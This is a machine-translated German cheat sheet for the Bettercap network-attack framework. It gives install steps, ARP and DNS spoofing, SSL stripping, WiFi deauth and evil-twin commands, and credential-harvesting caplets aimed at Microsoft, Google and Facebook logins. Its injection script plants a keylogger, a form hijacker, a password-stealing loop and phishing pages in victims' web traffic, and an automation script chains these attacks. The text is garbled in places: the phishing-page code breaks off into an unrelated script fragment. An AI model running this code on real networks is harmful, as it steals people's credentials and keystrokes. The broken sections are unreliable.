bessercap Cheat Blatt
Überblick
Bettercap ist ein leistungsfähiges, modulares und tragbares Netzwerk-Aufklärung und MITM (Man-in-the-Middle) Angriffsrahmen für Sicherheitsforscher, Penetrationsprüfer und Netzwerkadministratoren. Ursprünglich als moderner Ersatz für Ettercap entwickelt, hat sich Bettercap zu einer umfassenden Netzwerk-Sicherheitstest-Plattform entwickelt, die mehrere Angriffsvektoren und Aufklärungstechniken zu einem einzigen, einheitlichen Rahmen verbindet. Das Tool wird in Go geschrieben, so dass es sehr tragbar und effizient über verschiedene Betriebssysteme und Architekturen.
Die modulare Architektur des Frameworks ermöglicht es Anwendern, spezifische Module für verschiedene Arten von Netzwerkangriffen und Aufklärungsaktivitäten zu laden und auszuführen. Bettercap unterstützt eine breite Palette von Protokollen und Angriffstechniken, darunter ARP-Spoofing, DNS-Spoofing, DHCP-Spoofing, Wireless-Angriffe, Bluetooth Low Energy (BLE)-Angriffe und HTTP/HTTPS-Proxy-Angriffe. Dieser umfassende Ansatz macht es zu einem unschätzbaren Werkzeug für Sicherheitsexperten, die Netzwerksicherheit aus mehreren Winkeln bewerten und Schwachstellen in verschiedenen Netzwerkschichten identifizieren müssen.
Eine der wichtigsten Stärken von Bettercap ist seine Echtzeit-Web-basierte Benutzeroberfläche, die ein intuitives Dashboard zur Überwachung und Steuerung von Angriffen bietet. Das Web UI zeigt Live-Netzwerkverkehr, erfasste Anmeldeinformationen, entdeckte Hosts und Angriffsstatus in einem leicht zu verstehenden Format. Zusätzlich enthält Bettercap leistungsfähige Skriptfunktionen durch seine JavaScript-Engine, so dass Benutzer benutzerdefinierte Angriffsszenarien erstellen und komplexe Testverfahren automatisieren können. Mit seiner aktiven Entwicklungsgemeinschaft und regelmäßigen Updates entwickelt sich Bettercap weiterhin als eines der vielseitigsten und effektivsten Netzwerksicherheitstests.
Installation
Ubuntu/Debian Installation
Installieren von Bettercap auf Ubuntu/Debian-Systemen:
```bash
Update system packages
sudo apt update && sudo apt upgrade -y
Install required dependencies
sudo apt install -y build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev \ git wget curl
Install Go (required for building from source)
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc source ~/.bashrc
Verify Go installation
go version
Install Bettercap using Go
go install github.com/bettercap/bettercap@latest
Add Go bin to PATH
echo 'export PATH=$PATH:$(go env GOPATH)/bin' >> ~/.bashrc source ~/.bashrc
Alternative: Install pre-compiled binary
wget https://github.com/bettercap/bettercap/releases/latest/download/bettercap_linux_amd64_v2.32.0.zip unzip bettercap_linux_amd64_v2.32.0.zip sudo mv bettercap /usr/local/bin/ sudo chmod +x /usr/local/bin/bettercap
Install UI dependencies (optional)
sudo apt install -y nodejs npm sudo npm install -g @bettercap/ui
Create bettercap user (optional)
sudo useradd -r -s /bin/false bettercap sudo usermod -a -G bettercap $USER
Set capabilities for non-root execution
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
Verify installation
bettercap -version ```_
CentOS/RHEL Installation
```bash
Install EPEL repository
sudo yum install -y epel-release
Install required packages
sudo yum groupinstall -y "Development Tools" sudo yum install -y libpcap-devel libusb-devel libnetfilter_queue-devel \ git wget curl
Install Go
wget https://golang.org/dl/go1.21.0.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc source ~/.bashrc
Install Bettercap
go install github.com/bettercap/bettercap@latest
Set capabilities
sudo setcap cap_net_raw,cap_net_admin=eip $(go env GOPATH)/bin/bettercap
Configure firewall
sudo firewall-cmd --permanent --add-port=80/tcp sudo firewall-cmd --permanent --add-port=443/tcp sudo firewall-cmd --permanent --add-port=8080/tcp sudo firewall-cmd --reload ```_
macOS Installation
```bash
Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install dependencies
brew install libpcap
Install Go
brew install go
Install Bettercap
go install github.com/bettercap/bettercap@latest
Alternative: Install via Homebrew
brew install bettercap
Verify installation
bettercap -version ```_
Docker Installation
Running Bettercap in Docker:
```bash
Pull official Bettercap Docker image
docker pull bettercap/bettercap
Run Bettercap in Docker with network access
docker run -it --rm --privileged --net=host \ -v $(pwd):/app \ bettercap/bettercap
Run with web UI
docker run -it --rm --privileged --net=host \ -p 80:80 -p 443:443 \ -v $(pwd):/app \ bettercap/bettercap \ -iface eth0 -caplet http-ui
Create custom Dockerfile
cat > Dockerfile.bettercap ``<< 'EOF' FROM golang:1.21-alpine AS builder
Install dependencies
RUN apk add --no-cache git build-base libpcap-dev libusb-dev linux-headers
Build Bettercap
RUN go install github.com/bettercap/bettercap@latest
FROM alpine:latest
Install runtime dependencies
RUN apk add --no-cache libpcap libusb iptables
Copy binary
COPY --from=builder /go/bin/bettercap /usr/local/bin/
Create working directory
WORKDIR /app
Expose ports
EXPOSE 80 443 8080
Default command
CMD ["bettercap"] EOF
Build custom image
docker build -f Dockerfile.bettercap -t custom-bettercap .
Run custom image
docker run -it --rm --privileged --net=host custom-bettercap ```_
Windows Installation
```powershell
Install using Chocolatey
choco install golang choco install git
Install Bettercap
go install github.com/bettercap/bettercap@latest
Alternative: Download pre-compiled binary
Download from: https://github.com/bettercap/bettercap/releases
# Extract to C:\Program Files\Bettercap\
Install WinPcap or Npcap (required for packet capture)
Download from: https://npcap.com/
Add to PATH
$env:PATH += ";C:\Program Files\Bettercap"
Verify installation
bettercap.exe -version ```_
Basisnutzung
Network Discovery
Grundlegende Netzwerkaufklärung und Entdeckung:
```bash
Start Bettercap with automatic interface detection
sudo bettercap
Specify network interface
sudo bettercap -iface eth0
Enable network discovery
sudo bettercap -iface eth0
`` net.probe on net.show
Discover hosts with specific probes
set net.probe.mdns true set net.probe.nbns true set net.probe.upnp true set net.probe.wsd true net.probe on
Show discovered hosts
hosts.show
Show network statistics
net.stats
Continuous host discovery
set ticker.period 1 set ticker.commands "clear; net.show; hosts.show" ticker on
Save discovered hosts
hosts.save /tmp/discovered_hosts.json
Load previously saved hosts
hosts.load /tmp/discovered_hosts.json ```_
ARP Spoofing
ARP Spoofing-Angriffe ausführen:
```bash
Basic ARP spoofing setup
sudo bettercap -iface eth0
Enable ARP spoofing for entire subnet
arp.spoof on
Target specific hosts
set arp.spoof.targets 192.168.1.100,192.168.1.101 arp.spoof on
Spoof specific gateway
set arp.spoof.fullduplex false set arp.spoof.targets 192.168.1.1 arp.spoof on
Monitor ARP spoofing status
arp.spoof.stats
Advanced ARP spoofing with custom intervals
set arp.spoof.interval 1s set arp.spoof.silent false arp.spoof on
Whitelist specific hosts (exclude from spoofing)
set arp.spoof.whitelist 192.168.1.50,192.168.1.51 arp.spoof on
Stop ARP spoofing
arp.spoof off
Ban specific hosts (disconnect them)
arp.ban 192.168.1.100 arp.unban 192.168.1.100 ```_
DNS Spoofing
DNS Spoofing und Umleitung:
```bash
Enable DNS spoofing
sudo bettercap -iface eth0
dns.spoof on
Spoof specific domains
set dns.spoof.domains example.com,*.google.com set dns.spoof.address 192.168.1.50 dns.spoof on
Use custom DNS spoofing rules
set dns.spoof.hosts /tmp/dns_hosts.txt dns.spoof on
Create custom DNS hosts file
cat > /tmp/dns_hosts.txt << 'EOF'
Custom DNS spoofing rules
example.com 192.168.1.50 *.facebook.com 192.168.1.51 login.microsoft.com 192.168.1.52 EOF
Advanced DNS spoofing with logging
set dns.spoof.silent false set dns.spoof.domains * dns.spoof on
Monitor DNS queries
events.stream on
Stop DNS spoofing
dns.spoof off ```_
HTTP/HTTPS Proxy
Einrichten von HTTP/HTTPS-Proxy für die Verkehrsabhörung:
```bash
Enable HTTP proxy
sudo bettercap -iface eth0
http.proxy on
Enable HTTPS proxy with SSL stripping
https.proxy on set https.proxy.sslstrip true
Custom proxy port
set http.proxy.port 8080 set https.proxy.port 8443 http.proxy on https.proxy on
Inject custom JavaScript
set http.proxy.script /tmp/inject.js http.proxy on
Create JavaScript injection script
cat > /tmp/inject.js << 'EOF' function onRequest(req, res) \\{ log("Request: " + req.Method + " " + req.URL);
// Log headers
for (var name in req.Headers) \\\\{
log("Header: " + name + " = " + req.Headers[name]);
\\\\}
\\}
function onResponse(req, res) \\{ log("Response: " + res.Status + " for " + req.URL);
// Inject custom content
if (res.ContentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
var newBody = body.replace("</body>",
"<script>alert('Injected by Bettercap');</script></body>");
res.Body = newBody;
\\\\}
\\} EOF
Monitor proxy traffic
events.stream on
Save captured data
http.proxy.dump /tmp/http_traffic.log ```_
Erweiterte Funktionen
Funkangriffe
WiFi Aufklärung und Angriffe:
```bash
Enable WiFi monitoring mode (requires compatible adapter)
sudo bettercap -iface wlan0
Start WiFi reconnaissance
wifi.recon on
Show discovered access points
wifi.show
Show connected clients
wifi.show.clients
Target specific access point
wifi.recon.channel 6 set wifi.recon.channel 6 wifi.recon on
Deauthentication attack
set wifi.deauth.targets aa:bb:cc:dd:ee:ff wifi.deauth
Handshake capture
set wifi.handshakes.file /tmp/handshakes.pcap wifi.recon on
Evil twin attack
set wifi.ap.ssid "Free WiFi" set wifi.ap.bssid aa:bb:cc:dd:ee:ff set wifi.ap.channel 6 wifi.ap
WPS attacks
wifi.recon on wifi.show set wifi.wps.targets aa:bb:cc:dd:ee:ff wifi.wps
Monitor WiFi events
events.stream on ```_
Bluetooth Low Energy (BLE) Angriffe
BLE Aufklärung und Angriffe:
```bash
Enable BLE reconnaissance
sudo bettercap
ble.recon on
Show discovered BLE devices
ble.show
Enumerate BLE device services
ble.enum aa:bb:cc:dd:ee:ff
Write to BLE characteristics
ble.write aa:bb:cc:dd:ee:ff 1800 2a00 "payload"
Clone BLE device
set ble.clone.target aa:bb:cc:dd:ee:ff ble.clone
Monitor BLE events
events.stream on
Save BLE scan results
ble.save /tmp/ble_devices.json ```_
Zollkontingente
Erstellen und Verwenden von benutzerdefinierten Caplets (Automatisierungsskripte):
```bash
Create basic reconnaissance caplet
cat > /tmp/recon.cap << 'EOF'
Basic network reconnaissance caplet
Set interface
set $ \\{by_name eth0\\}
Enable network discovery
set net.probe.mdns true set net.probe.nbns true set net.probe.upnp true net.probe on
Enable ARP spoofing for entire subnet
arp.spoof on
Enable DNS spoofing
set dns.spoof.domains * set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
Enable HTTP proxy
set http.proxy.script /tmp/inject.js http.proxy on
Enable HTTPS proxy with SSL stripping
set https.proxy.sslstrip true https.proxy on
Start event streaming
events.stream on
Display status every 5 seconds
set ticker.period 5 set ticker.commands "clear; net.show; hosts.show" ticker on EOF
Run caplet
sudo bettercap -caplet /tmp/recon.cap
Create advanced MITM caplet
cat > /tmp/mitm.cap << 'EOF'
Advanced MITM attack caplet
Variables
set $TARGET 192.168.1.100 set $GATEWAY 192.168.1.1 set $INTERFACE eth0
Set interface
set $ \\{by_name $INTERFACE\\}
Target specific host
set arp.spoof.targets $TARGET set arp.spoof.fullduplex true arp.spoof on
DNS spoofing for specific domains
set dns.spoof.domains facebook.com,.facebook.com,google.com,.google.com set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
HTTP/HTTPS proxy with custom script
set http.proxy.script /tmp/advanced_inject.js http.proxy on
set https.proxy.sslstrip true set https.proxy.script /tmp/advanced_inject.js https.proxy on
Logging
set http.proxy.dump /tmp/http_dump.log set https.proxy.dump /tmp/https_dump.log
Events
events.stream on EOF
Create credential harvesting caplet
cat > /tmp/harvest.cap << 'EOF'
Credential harvesting caplet
Set interface
set $ \\{by_name eth0\\}
ARP spoofing
arp.spoof on
DNS spoofing to redirect login pages
set dns.spoof.domains login.microsoft.com,accounts.google.com,www.facebook.com set dns.spoof.address \\{interface.ipv4\\} dns.spoof on
HTTP proxy with credential extraction
set http.proxy.script /tmp/harvest.js http.proxy on
HTTPS proxy
set https.proxy.sslstrip true set https.proxy.script /tmp/harvest.js https.proxy on
Start web server for phishing pages
set http.server.path /tmp/phishing set http.server.port 80 http.server on
events.stream on EOF
Run specific caplet
sudo bettercap -caplet /tmp/mitm.cap -iface eth0 ```_
JavaScript Module
Erweiterte JavaScript-Module für benutzerdefinierte Angriffe:
```javascript // Advanced HTTP/HTTPS injection script // File: /tmp/advanced_inject.js
var credentials = []; var sessions = \\{\\};
function onLoad() \\{ log("Advanced injection module loaded"); \\}
function onRequest(req, res) \\{ var url = req.URL; var method = req.Method; var host = req.Hostname;
log("[" + method + "] " + host + url);
// Log interesting headers
if (req.Headers["Authorization"]) \\\\{
log("Authorization header found: " + req.Headers["Authorization"]);
\\\\}
if (req.Headers["Cookie"]) \\\\{
log("Cookies: " + req.Headers["Cookie"]);
sessions[host] = req.Headers["Cookie"];
\\\\}
// Extract POST data for credential harvesting
if (method == "POST" && req.Body) \\\\{
var body = req.ReadBody();
log("POST data: " + body);
// Look for common credential fields
| if (body.indexOf("password") != -1 | | body.indexOf("passwd") != -1) \\{ | log("Potential credentials captured: " + body); credentials.push(\\{ host: host, url: url, data: body, timestamp: new Date().toISOString() \\});
// Save credentials to file
writeFile("/tmp/credentials.json", JSON.stringify(credentials, null, 2));
\\\\}
\\\\}
\\}
function onResponse(req, res) \\{ var contentType = res.ContentType; var url = req.URL; var host = req.Hostname;
log("Response: " + res.Status + " for " + url);
// Inject into HTML pages
if (contentType.indexOf("text/html") == 0) \\\\{
var body = res.ReadBody();
// Inject keylogger
var keylogger = `
<script>
var keys = [];
document.addEventListener('keydown', function(e) \\{
keys.push(\\{
key: e.key,
timestamp: new Date().toISOString(),
url: window.location.href
\\});
// Send to attacker server every 50 keystrokes
if (keys.length >= 50) \\{
fetch('/keylog', \\{
method: 'POST',
body: JSON.stringify(keys),
headers: \\{'Content-Type': 'application/json'\\}
\\});
keys = [];
\\}
\\});
// Send on page unload
window.addEventListener('beforeunload', function() \\{
if (keys.length > 0) \\{
navigator.sendBeacon('/keylog', JSON.stringify(keys));
\\}
\\});
</script>
`;
// Inject form hijacker
var formHijacker = `
<script>
document.addEventListener('DOMContentLoaded', function() \\{
var forms = document.querySelectorAll('form');
forms.forEach(function(form) \\{
form.addEventListener('submit', function(e) \\{
var formData = new FormData(form);
var data = \\{\\};
for (var pair of formData.entries()) \\{
data[pair[0]] = pair[1];
\\}
fetch('/formdata', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
data: data,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\});
\\});
\\});
</script>
`;
// Inject scripts before closing body tag
body = body.replace("</body>", keylogger + formHijacker + "</body>");
// Replace login pages with phishing pages
| if (url.indexOf("login") != -1 | | url.indexOf("signin") != -1) \\{ | body = createPhishingPage(host, url); \\}
res.Body = body;
\\\\}
// Modify JavaScript files
| if (contentType.indexOf("application/javascript") == 0 | | | contentType.indexOf("text/javascript") == 0) \\{ var body = res.ReadBody();
// Inject malicious code into JavaScript
var maliciousCode = `
// Injected by Bettercap
setInterval(function() \\{
if (document.querySelector('input[type="password"]')) \\{
var passwords = document.querySelectorAll('input[type="password"]');
passwords.forEach(function(p) \\{
if (p.value) \\{
fetch('/password', \\{
method: 'POST',
body: JSON.stringify(\\{
url: window.location.href,
password: p.value,
timestamp: new Date().toISOString()
\\}),
headers: \\{'Content-Type': 'application/json'\\}
\\});
\\}
\\});
\\}
\\}, 5000);
`;
body = maliciousCode + "\n" + body;
res.Body = body;
\\\\}
\\}
function createPhishingPage(host, url) \\{ return ` <!DOCTYPE html>
Sign In
# Run MITM attack
bettercap -caplet "$OUTPUT_DIR/mitm.cap" 2>&1|tee -a "$LOG_FILE" &
BETTERCAP_PID=$!
log_message "MITM attack started (PID: $BETTERCAP_PID)"
# Run for specified duration or until interrupted
local duration=$\\\\{ATTACK_DURATION:-300\\\\} # 5 minutes default
sleep "$duration"
# Stop attack
kill $BETTERCAP_PID 2>/dev/null
log_message "MITM attack stopped"
\\}
WiFi attacks
wifi_attack() \\{ local wifi_interface="$1"
log_message "Starting WiFi attacks on $wifi_interface..."
cat > "$OUTPUT_DIR/wifi.cap" << EOF
WiFi attack caplet
set \$ \\{by_name $wifi_interface\\}
WiFi reconnaissance
wifi.recon on
Save discovered networks
wifi.save $OUTPUT_DIR/wifi_networks.json
Handshake capture
set wifi.handshakes.file $OUTPUT_DIR/handshakes.pcap
Run for 5 minutes
sleep 300
Stop and save
wifi.recon off quit EOF
timeout 360 bettercap -caplet "$OUTPUT_DIR/wifi.cap" 2>&1|tee -a "$LOG_FILE"
log_message "WiFi attacks completed"
\\}
Generate report
generate_report() \\{ log_message "Generating attack report..."
local report_file="$OUTPUT_DIR/attack_report.html"
cat > "$report_file" << EOF
Bettercap Attack Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
Discovered Hosts
Port Scan Results
Captured Traffic Summary
Attack Log
$(tail -n 50 "$LOG_FILE")
EOF
log_message "Report generated: $report_file"
\\}
Cleanup function
cleanup() \\{ log_message "Cleaning up..."
# Kill any running Bettercap processes
pkill -f bettercap 2>/dev/null
# Reset network settings
echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
log_message "Cleanup completed"
\\}
Signal handlers
trap cleanup EXIT trap cleanup INT trap cleanup TERM
Main execution
main() \\{ log_message "Starting Bettercap automation script"
check_root
check_dependencies
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
case "$ATTACK_TYPE" in
"recon")
network_recon
;;
"mitm")
network_recon
# Extract targets from reconnaissance
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
# Get first discovered host as target
| local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json" | head -n 1 | cut -d'"' -f4) | if [ -n "$target" ]; then mitm_attack "$target" fi fi ;; "wifi") wifi_attack "wlan0" ;; "full") network_recon
if [ -f "$OUTPUT_DIR/discovered_hosts.json" ]; then
| local target=$(grep -o '"ip":"[^"]*"' "$OUTPUT_DIR/discovered_hosts.json" | head -n 1 | cut -d'"' -f4) | if [ -n "$target" ]; then mitm_attack "$target" fi fi
# WiFi attacks if interface available
if ip link show wlan0 >/dev/null 2>&1; then
wifi_attack "wlan0"
fi
;;
*)
log_message "Unknown attack type: $ATTACK_TYPE"
exit 1
;;
esac
generate_report
log_message "Attack completed. Results in: $OUTPUT_DIR"
\\}
Parse command line arguments
while [[ $# -gt 0 ]]; do case $1 in -i|--interface) INTERFACE="$2" shift 2 ;; -t|--target) TARGET_NETWORK="$2" shift 2 ;; -a|--attack) ATTACK_TYPE="$2" shift 2 ;; -d|--duration) ATTACK_DURATION="$2" shift 2 ;; -h|--help) echo "Usage: $0 [OPTIONS]" echo "Options:" echo " -i, --interface IFACE Network interface (default: eth0)" echo " -t, --target NETWORK Target network (default: 192.168.1.0/24)" | echo " -a, --attack TYPE Attack type: recon | mitm | wifi | full (default: mitm)" | echo " -d, --duration SECONDS Attack duration (default: 300)" echo " -h, --help Show this help" exit 0 ;; *) echo "Unknown option: $1" exit 1 ;; esac done
Run main function
main ```_
Integrationsbeispiele
SIEM Integration
```python
!/usr/bin/env python3
Bettercap SIEM integration script
import json import time import requests import subprocess from datetime import datetime import logging
class BettercapSIEMIntegration: def init(self, config): self.config = config self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/bettercap_siem.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def parse_bettercap_events(self, events_file):
"""Parse Bettercap events log file"""
events = []
try:
with open(events_file, 'r') as f:
for line in f:
if line.strip():
try:
event = json.loads(line)
events.append(self.normalize_event(event))
except json.JSONDecodeError:
# Handle non-JSON log lines
events.append(self.parse_text_event(line))
except FileNotFoundError:
self.logger.error(f"Events file not found: \\\\{events_file\\\\}")
return events
def normalize_event(self, event):
"""Normalize Bettercap event to common format"""
normalized = \\\\{
'timestamp': event.get('time', datetime.now().isoformat()),
'source': 'bettercap',
'event_type': event.get('tag', 'unknown'),
'severity': self.determine_severity(event),
'raw_event': event
\\\\}
# Extract specific fields based on event type
tag = event.get('tag', '')
if tag == 'net.sniff':
normalized.update(\\\\{
'src_ip': event.get('data', \\\\{\\\\}).get('src'),
'dst_ip': event.get('data', \\\\{\\\\}).get('dst'),
'protocol': event.get('data', \\\\{\\\\}).get('protocol'),
'payload': event.get('data', \\\\{\\\\}).get('payload')
\\\\})
elif tag == 'arp.spoof':
normalized.update(\\\\{
'target_ip': event.get('data', \\\\{\\\\}).get('target'),
'gateway_ip': event.get('data', \\\\{\\\\}).get('gateway'),
'attack_type': 'arp_spoofing'
\\\\})
elif tag == 'dns.spoof':
normalized.update(\\\\{
'domain': event.get('data', \\\\{\\\\}).get('domain'),
'spoofed_ip': event.get('data', \\\\{\\\\}).get('address'),
'attack_type': 'dns_spoofing'
\\\\})
elif tag == 'http.proxy':
normalized.update(\\\\{
'method': event.get('data', \\\\{\\\\}).get('method'),
'url': event.get('data', \\\\{\\\\}).get('url'),
'user_agent': event.get('data', \\\\{\\\\}).get('user_agent'),
'attack_type': 'http_interception'
\\\\})
return normalized
def parse_text_event(self, line):
"""Parse non-JSON log lines"""
return \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'bettercap',
'event_type': 'log',
'severity': 'info',
'message': line.strip()
\\\\}
def determine_severity(self, event):
"""Determine event severity"""
tag = event.get('tag', '')
high_severity_tags = ['arp.spoof', 'dns.spoof', 'wifi.deauth', 'ble.attack']
medium_severity_tags = ['http.proxy', 'https.proxy', 'net.sniff']
if tag in high_severity_tags:
return 'high'
elif tag in medium_severity_tags:
return 'medium'
else:
return 'low'
def send_to_splunk(self, events):
"""Send events to Splunk via HEC"""
if not self.config.get('splunk', \\\\{\\\\}).get('enabled', False):
return
splunk_config = self.config['splunk']
for event in events:
splunk_event = \\\\{
'time': event['timestamp'],
'source': 'bettercap',
'sourcetype': 'bettercap:event',
'index': splunk_config.get('index', 'security'),
'event': event
\\\\}
try:
response = requests.post(
splunk_config['hec_url'],
headers=\\\\{
'Authorization': f"Splunk \\\\{splunk_config['token']\\\\}",
'Content-Type': 'application/json'
\\\\},
json=splunk_event,
verify=False,
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send to Splunk: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Splunk: \\\\{e\\\\}")
def send_to_elasticsearch(self, events):
"""Send events to Elasticsearch"""
if not self.config.get('elasticsearch', \\\\{\\\\}).get('enabled', False):
return
es_config = self.config['elasticsearch']
for event in events:
index_name = f"bettercap-\\\\{datetime.now().strftime('%Y.%m.%d')\\\\}"
try:
response = requests.post(
f"\\\\{es_config['url']\\\\}/\\\\{index_name\\\\}/_doc",
json=event,
timeout=10
)
if response.status_code not in [200, 201]:
self.logger.error(f"Failed to send to Elasticsearch: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending to Elasticsearch: \\\\{e\\\\}")
def generate_alerts(self, events):
"""Generate alerts based on event patterns"""
alerts = []
# Group events by type and time
event_groups = \\\\{\\\\}
for event in events:
key = f"\\\\{event['event_type']\\\\}_\\\\{event.get('src_ip', 'unknown')\\\\}"
if key not in event_groups:
event_groups[key] = []
event_groups[key].append(event)
# Check for suspicious patterns
for group_key, group_events in event_groups.items():
if len(group_events) > 10: # High frequency
alerts.append(\\\\{
'alert_type': 'high_frequency_events',
'severity': 'high',
'description': f"High frequency of \\\\{group_events[0]['event_type']\\\\} events",
'event_count': len(group_events),
'time_window': '5 minutes',
'source_ip': group_events[0].get('src_ip'),
'timestamp': datetime.now().isoformat()
\\\\})
# Check for credential harvesting
credential_events = [e for e in events if 'password' in str(e).lower()]
if credential_events:
alerts.append(\\\\{
'alert_type': 'credential_harvesting',
'severity': 'critical',
'description': 'Potential credential harvesting detected',
'event_count': len(credential_events),
'timestamp': datetime.now().isoformat()
\\\\})
return alerts
def process_events(self, events_file):
"""Process Bettercap events and send to SIEM"""
self.logger.info(f"Processing events from \\\\{events_file\\\\}")
events = self.parse_bettercap_events(events_file)
if not events:
self.logger.info("No events to process")
return
self.logger.info(f"Processing \\\\{len(events)\\\\} events")
# Send to configured SIEM systems
self.send_to_splunk(events)
self.send_to_elasticsearch(events)
# Generate and send alerts
alerts = self.generate_alerts(events)
if alerts:
self.logger.info(f"Generated \\\\{len(alerts)\\\\} alerts")
for alert in alerts:
self.send_alert(alert)
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT: \\\\{alert['description']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
# Implementation depends on email configuration
pass
Configuration
config = \\{ 'splunk': \\{ 'enabled': True, 'hec_url': 'https://splunk.company.com:8088/services/collector/event', 'token': 'your-hec-token', 'index': 'security' \\}, 'elasticsearch': \\{ 'enabled': True, 'url': 'http://elasticsearch.company.com:9200' \\}, 'email': \\{ 'enabled': False, 'smtp_server': 'smtp.company.com', 'from': 'security@company.com', 'to': 'soc@company.com' \\} \\}
Usage
if name == "main": import sys
if len(sys.argv) != 2:
print("Usage: python3 bettercap_siem.py <events_file>")
sys.exit(1)
events_file = sys.argv[1]
integration = BettercapSIEMIntegration(config)
integration.process_events(events_file)
```_
Fehlerbehebung
Gemeinsame Themen
Verweigerte Fehler: ```bash
Set proper capabilities
sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bin/bettercap
Check capabilities
getcap /usr/local/bin/bettercap
Run with sudo if capabilities don't work
sudo bettercap
Check interface permissions
sudo chmod 666 /dev/net/tun ```_
Einzelheiten: ```bash
List available interfaces
ip link show
Check interface status
ip addr show eth0
Bring interface up
sudo ip link set eth0 up
Check for monitor mode (WiFi)
sudo iwconfig wlan0 mode monitor sudo ip link set wlan0 up ```_
Modul Belastungsprobleme: ```bash
Check available modules
bettercap -help
Update Bettercap
go install github.com/bettercap/bettercap@latest
Check Go environment
go env GOPATH go env GOROOT
Verify installation
bettercap -version bettercap -env-info ```_
Leistungsoptimierung
Optimieren von Bettercap-Leistung:
```bash
Increase system limits
echo " soft nofile 65536" >> /etc/security/limits.conf echo " hard nofile 65536" >> /etc/security/limits.conf
Optimize network buffers
echo 'net.core.rmem_max = 134217728' >> /etc/sysctl.conf echo 'net.core.wmem_max = 134217728' >> /etc/sysctl.conf echo 'net.core.netdev_max_backlog = 5000' >> /etc/sysctl.conf sysctl -p
Use performance caplet settings
set net.probe.throttle 10 set arp.spoof.interval 1s set ticker.period 5 ```_
Sicherheitsüberlegungen
Ethische Nutzung
Rechtliche Erwägungen: - Verwenden Sie nur Bettercap in Netzwerken, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Lokale Gesetze über Netzwerksicherheitstests verstehen - ordnungsgemäße Genehmigung vor Durchführung von Penetrationstests - Dokumentation aller Prüftätigkeiten für die Erfüllung von Zwecken - Respektieren Sie Privatsphäre und Vertraulichkeit erfasster Daten
** Sicherheit:** - Verwenden Sie Bettercap in isolierten Testumgebungen, wenn möglich - Implementierung richtiger Zugriffskontrollen für erfasste Daten - Sichere Speicherung und Übermittlung sensibler Informationen - Regelmäßige Updates von Bettercap und Abhängigkeiten - Monitor für die Erkennung durch Netzwerksicherheitssysteme
Datenschutz
** Erfassung der Datensicherheit:** - Verschlüsseln erfasster Verkehr und Anmeldeinformationen - Implementieren Sie sichere Löschung von temporären Dateien - Verwenden Sie sichere Kanäle für die Datenübertragung - Umsetzung von Datenschutzbestimmungen - Regelmäßige Sicherheitsbewertungen der Prüfinfrastruktur
Referenzen
- [Beratende Website](https://_LINK_5___
- [Bettercap GitHub Repository](__LINK_5___
- (__LINK_5___)
- Go Programming Language
- Network Security Testing Best Practices